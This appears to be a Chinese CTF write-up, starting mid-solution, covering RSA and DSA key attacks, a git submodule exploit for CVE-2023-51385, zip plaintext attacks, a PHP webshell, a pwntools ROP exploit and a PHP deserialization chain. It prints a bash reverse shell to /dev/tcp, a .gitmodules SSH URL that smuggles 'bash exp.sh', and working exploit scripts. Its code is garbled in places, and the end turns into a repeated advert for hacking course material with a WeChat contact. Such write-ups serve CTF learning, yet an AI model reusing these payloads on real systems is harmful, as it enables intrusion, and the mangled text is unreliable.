if debug:
print(“looking for independent vectors in the lattice”)
found_polynomials = False
for pol1_idx in range(nn - 1):
for pol2_idx in range(pol1_idx + 1, nn):
for i and j, create the two polynomials
PR.<w,z> = PolynomialRing(ZZ)
pol1 = pol2 = 0
for jj in range(nn):
pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)
resultant
PR. = PolynomialRing(ZZ)
rr = pol1.resultant(pol2)
are these good polynomials?
if rr.is_zero() or rr.monomials() == [1]:
continue
else:
print(“found them, using vectors”, pol1_idx, “and”, pol2_idx)
found_polynomials = True
break
if found_polynomials:
break
if not found_polynomials:
print(“no independant vectors could be found. This should very rarely happen…”)
return 0, 0
rr = rr(q, q)
solutions
soly = rr.roots()
if len(soly) == 0:
print(“Your prediction (delta) is too small”)
return 0, 0
soly = soly[0][0]
ss = pol1(q, soly)
solx = ss.roots()[0][0]
return solx, soly
delta = .271 # this means that d < N^delta
m = 8 # size of the lattice (bigger the better/slower)
t = int((1 - 2 * delta) * m) # optimization from Herrmann and May
X = 2 * floor(N ^ delta) # this _might_ be too much
Y = floor(N ^ (1 / 2)) # correct if p, q are ~ same size
P.<x,y> = PolynomialRing(ZZ)
A = int((N + 1) / 2)
pol = 1 + x * (A + y)
solx, soly = boneh_durfee(pol, e, m, t, X, Y)
d = int(pol(solx, soly) / e)
print(d)
m = power_mod(c, d, N)
可以求出
a=24601959430759983424400804734518943158892550216065342062971649989571838687333
用已有的·数据进行k相关攻击.
from Crypto.Util.number import *
a=24601959430759983424400804734518943158892550216065342062971649989571838687333
b=17474742587088593627
p= 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379
q= 1115861146902610160756777713087325311747309309771
g= 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962
y= 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360
(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779
(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419
k = (h1*r2 - h2*r1 + b*s2*r1) * inverse(s1*r2 - a*s2*r1, q) % q
x = (k*s1 - h1) * inverse(r1, q) %q
print(long_to_bytes(x))
得到最终flag
flag值:flag{l1near_k1s_unsafe}
题目序号 MISC(modules)
操作内容:
根据题目提示,在GitHub找到这个仓库,由于靶机不能访问GitHub故fork到gitlab
在库中新增exp.sh文件
bash -i>& /dev/tcp/IP``地址/端口号0>&1
反弹shell
用服务器监听
修改库中的.gitmodules文件
[submodule “cve”]
path = cve
url = ssh://bash exp.shfoo.ichunqiu.com/bar
最后到靶机输入仓库地址
u test / CVE-2023-51385_test · GitLab
git clone https://gitlab.com/testu2584/CVE-2023-51385_test.git --recurse-submodules
即可
flag值:flag{ec993bca-5790-4b17-9830-785079885277}
题目序号 MISC(谁偷吃了我的外卖)
操作内容:
使用foremost将图片小凯.jpg中的压缩包提取出来
通过查看压缩包大致猜测为将文件名全部提取出来,根据文件的序号进行排序,再将下划线后面的密文进行拼接得到最终密文
import zipfile
import re
import os
def get_filenames_from_zip(zip_path, output_file):
with zipfile.ZipFile(zip_path, ‘r’) as zf:
filenames = “\n”.join([name.encode(‘cp437’).decode(‘gbk’) for name in zf.namelist()])
with open(output_file, ‘w’, encoding=‘utf-8’) as f:
f.write(filenames)
zip_path = r"C:\Users\32541\Desktop\外卖箱.zip"
output_file = ‘filenames.txt’
get_filenames_from_zip(zip_path, output_file)
with open(‘filenames.txt’, ‘r’, encoding=‘utf-8’) as f:
lines = f.readlines()
user_lines = [line for line in lines if line.startswith(‘外卖箱/用户’)]
sorted_user_lines = sorted(user_lines, key=lambda x: int(x.split(‘用户’)[1].split(‘_’)[0]))
with open(‘sorted_filenames.txt’, ‘w’, encoding=‘utf-8’) as f:
for line in sorted_user_lines:
f.write(line)
with open(‘sorted_filenames.txt’, ‘r’, encoding=‘utf-8’) as file:
lines = file.readlines()
result = ‘’
for line in lines:
match = re.search(r’_(.*?)的’, line)
if match:
result += match.group(1)
with open(‘result.txt’, ‘w’) as file:
file.write(result)
最后通过提示
将-替换成/后base64解码得到文件后保存(工具:https://the-x.cn/encodings/Base64.aspx)
将保存后的文件继续foremost解密得到新的压缩包
打开压缩包发现报错通过压缩包工具修复
文件内容:
最后通过这个装有钥匙.png的文件作为明文文件对之前的外卖箱.zip进行明文解密
最终得到解密后的zip文件
打开进入flag文件夹
查看小凯的奋斗故事.md
得到第一段flag:flag{W1sh_y0u_AaaAaaaa
查看txt.galf
倒叙得到第二段flag:aaaaaaa_w0nderfu1_CTF_journe9}
最后得到falg:
flag值:flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}
题目序号MISC(明文混淆)
操作内容:
根据题目描述可以大致猜想到压缩包为明文攻击,shell文件进行了代码混淆说明只有从license.txt文件下手,找到电脑中其他的license.txt发现大多数文件内容都是大同小异,使用bkcrack直接开始明文攻击。
7163444a 203b76b0 17de1387
得到了三个密钥,将文件提取出来
使用这个网址做解混淆的第一步UnPHP - The Online PHP Decoder
将这一段复制到shell2.php里面,将eval换成echo
得到如下代码:
?><?php
eval(gzinflate(base64_decode(‘U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==’)));
?> eval(@$_POST[‘flag{s1mpL3_z1p_@nd_w365heLl!!!}’]);?>
flag值:flag{s1mpL3_z1p_@nd_w365heLl!!!}
题目序号 PWN(nmanager)
操作内容:
下载附件进行分析
得知64位文件,开启了Canary保护和NX保护,放64位IDA进行反编译
编写出Exp:
from ctypes import *
from pwn import *
import time
io = remote(‘ip’ ,端口)
dl = CDLL(‘./libc.so.6’)
dl.srand(int(time.time()))
c = list(‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’)
c = c[dl.rand() % 62]
io.sendline(str©)
io.recvuntil(‘modify’)
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send(‘A’*8)
io.recvuntil('age: ')
io.sendline(p64(0x4142))
io.recvuntil('name: ')
io.send(‘B’)
io.recvuntil(‘A’*0x8)
libc_base = u64(io.recv(6)+b2*‘\x00’) - 528426
libc = ELF(‘libc.so.6’)
io.recvuntil(‘)’)
io.sendline(‘n’)
pop_rdi=rdi =libc_base+0x2a3e5
ret=pop_rdi+1
system=libc_base+libc.sym[‘system’]
bin_sh=libc_base+next(libc.search(b’/bin/sh’))
pay=p64(pop_rdi)+p64(bin_sh)+p64(system)
io.recvuntil(‘modify’)
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send(‘C’*‘10’)
io.recvuntil('age: ')
io.sendline(p64(ret))
io.recvuntil('name: ')
io.send(b’A’*7+p64(retu)*3+pay)
io.interactive()
得flag
flag值:flag{46d45ed7-f76b-4d3b-9095-360c434844cb}
题目序号 RE(UPX2023)
操作内容:
key = [111, 24, 236, 196, 58, 186, 93, 97, 61, 51, 169, 170, 2, 17, 113, 139, 162, 38, 14, 77, 131, 66, 112, 202, 80, 113, 231, 107, 15, 50, 159, 128, 155, 183, 227, 184, 224, 28, 16, 180, 42,57]
flag = [ 0x09, 0x63, 0xD9, 0xF6, 0x58, 0xDD, 0x3F, 0x4C, 0x0F, 0x0B, 0x98, 0xC6, 0x65, 0x21, 0x41, 0xED, 0xC4, 0x0B, 0x3A, 0x7B, 0xE5, 0x75, 0x5D, 0xA9, 0x31, 0x41, 0xD7, 0x52, 0x6C, 0x0A, 0xFA, 0xFD, 0xFA, 0x84, 0xDB, 0x89, 0xCD, 0x7E, 0x27, 0x85, 0x13,8 ]
string1 = ‘QAZWSXEDCRFVTGBYHNUJMIKOLP0987654321{}-!@#’
string2 = ‘QV4TAG3BZY2HWN1USJ{MXI}KEO-LDP!0C9@8R7#6F5’
sx = ‘’
for i in range(len(flag)):
sx += chr(flag[i]^(key[i]))
for i in string2:
print(sx[string1.index(i)],end=‘’)
flag值:flag{0305f8f2-14b6-fg7b-bc7a-010299c881e1}
题目序号WEB(ezezez_php)
操作内容:
通过审题可知是一题pop链,链子如下:
Ha->__destruct()->Rd->__call()->Er->__set($name, v a l u e ) − > g e t ( value)->get( value)−>get(url)
Exp:
<?php highlight\_file(\_\_FILE\_\_); include "function.php"; class Rd { public $ending; public $cl; public $poc; public function \_\_destruct() { echo "All matters have concluded".""; } public function \_\_call($name, $arg) { foreach ($arg as $key => $value) { if ($arg[0]['POC'] == "0.o") { $this->cl->var1 = "get"; } } } } class Poc { public $payload; public $fun; public function \_\_set($name, $value) { $this->payload = $name; $this->fun = $value; } function getflag($paylaod) { echo "Have you genuinely accomplished what you set out to do?".""; file\_get\_contents($paylaod); } } class Er { public $symbol; public $Flag; public function \_\_construct() { $this->symbol = True; } public function \_\_set($name, $value) { if (preg\_match('/^(file|http|https|gopher|dict)?:\/\/.\*(\/)?.\*$/',base64\_decode($this->Flag))){ $value($this->Flag); } else { echo "NoNoNo,please you can look hint.php".""; } } } class Ha { public $start; public $start1; public $start2; public function \_\_construct() { echo $this->start1 . "\_\_construct" . ""; } public function \_\_destruct() { **自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。** **深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**       **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!** **由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新** **如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**  ### 给大家的福利 **零基础入门** 对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。  同时每个成长路线对应的板块都有配套的视频提供:  因篇幅有限,仅展示部分资料 网络安全面试题  绿盟护网行动  还有大家最喜欢的黑客技术  **网络安全源码合集+工具包**   **所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~ **一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**  608e9062782d28f4f04f821405d99a.png) 同时每个成长路线对应的板块都有配套的视频提供:  因篇幅有限,仅展示部分资料 网络安全面试题  绿盟护网行动  还有大家最喜欢的黑客技术  **网络安全源码合集+工具包**   **所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~ **一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!** [外链图片转存中...(img-DPzSMMEZ-1712641850213)]
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
